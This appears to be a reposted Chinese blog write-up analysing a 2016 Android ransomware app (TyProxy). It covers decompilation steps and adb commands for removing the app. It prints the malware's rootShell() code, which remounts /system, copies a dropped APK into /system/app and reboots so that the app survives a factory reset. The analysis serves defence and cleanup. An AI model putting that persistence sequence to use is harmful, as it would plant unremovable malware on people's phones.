一次勒索app分析小记[后方核能预警]

作者: 封笔尘缘 分类: 技术杂谈 发布时间: 2016-5-5 ė1921 次浏览 60 条评论

原作者是邪恶十六进制的Yc表哥写的

邪恶的十六进制 原文地址

今天闲的抽风,于是乎蛋疼的在百度图片搜了个敏感关键字挨个图片举报,然后就遇到了某牛在核心群的求助

果断要图:

嗯。。。我觉得这张图是本月最佳截图


于是在核心群里找了安卓牛手把手教黑阔刷机的过程中,果断要来了APP进行一次XXOO,而各位跟我一样闲得蛋疼的人们发挥特长强势围观:

测试工具:

BlueStacks(root版)

ADB调试工具

apktool 2.1.0

dex2jar-2.0

 jd-gui-1.4.0.jar

不入虎穴焉得虎子,所以首先我们要看一下这东西到底有啥用,为了方便,这里使用root后的BlueStacks的安卓虚拟机进行安装,安装后找到TyProxy并启动:

启动之后,这999的界面顿时糊了我满脸

这高大上的界面。。。散发出神圣的光芒,吾等渣渣简直无法直视。点击启动全局,为了让它牛逼起来,点击授权,然后虚拟机就被重启了,接着。。。。心中万只神兽飞奔。。。

好了,看到了这款软件的基本功能之后,接下来就要开始简要分析了。

首先,使用apktool.jar来反编译TyProxy_1.0.apk,命令:

apktool.jar d TyProxy_1.0.apk

然后,使用7z打开TyProxy_1.0.apk,将classes.dex解压出来

使用dex2jar-2.0,将dex转成jar,命令:

d2j-dex2jar.bat classes.dex

得到classes-dex2jar.jar


接下来使用jd-gui-1.4.0.jar打开刚才生成的jar包,这样就反编译得到了java的代码,接下来我们来分析一下关键代码。

启动的入口是在com.moxuan下面的c.java这个Activity,

看到给一个按钮增加了事件监听,并做了初始化:d(this.path + "/zihao.l");

接下来到d()方法的代码,它将ijm-x86.so写到在this.path + "/zihao.l"这个路径,然后找到this.path,这个比较简单就不说了,其实就是获取外部存储卡的路径,一般为/sdcard/ zihao.l,也就是说写了一个文件到/sdcard/zihao.l

看下最关键的地方:



我们进入到rootShell()的代码:

void rootShell()

  {

    execCommand(new String[] { "mount -o rw,remount /system", "mount -o rw,remount /system/app", "cp /sdcard/zihao.l /system/app/", "chmod 777 /system/app/zihao.l", "mv /system/app/zihao.l /system/app/zihao.apk", "chmod 644 /system/app/zihao.apk", "reboot" }, true);

  }

这里用shell执行了命令,它重新mount /system,并获取读写/system/app/目录的权限,接着复制刚才释放到/sdcard/zihao.l的文件到/system/app/下,并改名为/system/app/zihao.apk,重新修改权限,最后reboot重启你的系统

通过上面分析,可以知道ijm-x86.so才是流氓的真身,实际上它也是一个app,最后它被安装到/system/app/,因为这个目录是系统软件的安装地方,所以手机双清确实无法清除它,但刷机是绝对可以清除的,并不像流氓软件写的刷机无法清除。

清除流氓:

删除/system/app/zihao.apk即可,使用ADB连接上手机,执行命令:

adb shell

进入shell,依次执行下面命令:

shell@hlteatt:/ $ su root

root@hlteatt:/ # rm /system/app/zihao.apk

root@hlteatt:/ #

执行后,桌面就可见了,接下来删除你刚才安装的流氓app就大功告成了。

由于要上班,所以就搞到这里了。啥?你说能不能把密码搞出来?当然可以,不过有点费时间。做这个软件的人不算low到极点,虽然代码很LOW风格烂到爆,但是好歹用上了腾讯云的乐固混淆加密,把混淆加密干掉,你就能得到代码了。


然后让我们在总结一下得到一个app的源代码的一般方法:


1.使用apktool.jar来反编译TyProxy_1.0.apk,命令:

apktool.jar d TyProxy_1.0.apk


2.使用7z打开TyProxy_1.0.apk,将classes.dex解压出来


3.使用dex2jar-2.0,将dex转成jar,执行命令后得到classes-dex2jar.jar命令:

d2j-dex2jar.bat classes.dex


4.使用jd-gui-1.4.0.jar打开刚才生成的jar包,这样就反编译得到了java的代码。



——-然后为了方便各位找解决方法的非计算机人群总结一下处理方法:


使用ADB连接上手机,执行命令:

adb shell


进入shell,依次执行下面命令:

shell@hlteatt:/ $ su root

root@hlteatt:/ # rm /system/app/zihao.apk

root@hlteatt:/ #


执行后,桌面就可见了,接下来删除你刚才安装的流氓app

逆向分析部分结束,接下来进行社工内容。。。


———————————————前方高能预警,非战斗人员请迅速撤离。———————————————



在我们正在搞手机的时候,我们的另一部分成员开始了社工的旅程,并成功获得了该软件的“主人”并且引出了以下对话


no zuo no die why you try,no try no high give me five

 

然后,当事人得出了一个沉痛的领悟。。。


至于这个骗子如何处理啊。。。我们打算提交警方,毕竟我们是热爱祖国遵守法律的好公民。。。。。。

本文出自 封笔尘缘 ,转载时请注明出处及相应链接。

本文永久链接: http://www.moxcn.com/?post=343

|

发表评论:

电子邮件地址不会被公开。 必填项已用*标注

Ɣ回顶部
sitemap